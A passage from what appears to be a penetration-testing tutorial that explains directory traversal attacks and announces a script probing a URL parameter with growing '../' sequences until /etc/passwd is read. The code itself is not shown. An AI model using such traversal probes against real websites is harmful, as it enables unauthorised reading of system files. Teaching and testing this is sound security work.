Occasionally, websites call files using unrestricted functions; this can allow the fabled Directory Traversal or Direct Object Reference (DOR). In this attack, a user can call arbitrary files within the context of the website by using a vulnerable parameter. There are two ways this can be manipulated: firstly, by providing an absolute link such as /etc/passwd, which states from the root directory browse to the etc directory and open the passwd file, and secondly, relative links that travel up directories in order to reach the root directory and travel to the intended file.

We will be creating a script that attempts to open a file that is always present on a Linux machine, the aforementioned /etc/passwd file by gradually increasing the number of up directories to a parameter in a URL. It will identify when it has succeeded by the detection of the phrase root that indicates that file has been opened.